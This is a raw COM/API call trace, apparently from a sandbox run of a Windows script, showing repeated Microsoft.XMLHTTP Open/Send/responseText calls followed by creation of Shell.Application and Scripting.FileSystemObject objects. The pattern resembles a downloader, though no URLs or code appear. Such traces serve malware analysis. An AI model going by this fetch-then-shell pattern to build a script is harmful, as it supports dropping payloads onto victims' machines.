	[0359.471] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0359.471] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0359.471] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0359.471] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0359.471] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0359.471] longjmp () 
	[0359.471] longjmp () 
	[0359.471] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0359.471] SysStringLen (param_1=0x0) returned 0x0
	[0359.471] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0359.471] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0359.471] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0359.471] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0359.472] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0359.472] ??2@YAPEAX_K@Z () returned 0x62f310
	[0359.472] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0359.472] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0359.472] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0359.472] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0359.472] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0359.472] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0359.472] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0359.472] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0359.472] longjmp () 
	[0359.472] longjmp () 
	[0359.472] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0359.472] SysStringLen (param_1=0x0) returned 0x0
	[0359.472] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0359.473] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0359.473] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0359.473] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0359.473] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0359.473] ??2@YAPEAX_K@Z () returned 0x62f330
	[0359.473] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0359.473] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0359.473] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0359.473] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0359.473] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0359.473] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0359.473] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0359.473] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0359.473] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0359.473] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0359.473] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0359.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0359.768] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0359.768] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0359.768] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0359.768] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0359.768] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0359.768] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0359.768] SysStringLen (param_1=0x0) returned 0x0
	[0359.768] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0359.768] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0359.768] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0359.768] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0359.768] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0359.769] ??2@YAPEAX_K@Z () returned 0x62f350
	[0359.769] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0359.769] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0359.769] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0359.769] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0359.769] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0359.769] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0359.769] SysStringLen (param_1=0x0) returned 0x0
	[0359.769] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0359.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0359.785] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0359.785] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0359.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0359.785] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0359.785] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0367.155] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0367.155] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0367.155] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0367.156] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0367.156] SysStringLen (param_1=0x0) returned 0x0
	[0367.156] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0367.157] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0367.157] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0367.157] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0367.157] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0367.157] ??2@YAPEAX_K@Z () returned 0x62f330
	[0367.157] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0367.157] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0367.157] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0367.157] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0367.157] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0367.157] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0367.157] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0367.159] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0367.160] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0367.160] SysStringLen (param_1=0x0) returned 0x0
	[0367.160] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0367.160] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0367.160] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0367.160] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0367.160] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0367.160] ??2@YAPEAX_K@Z () returned 0x62f310
	[0367.160] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0367.160] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0367.160] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
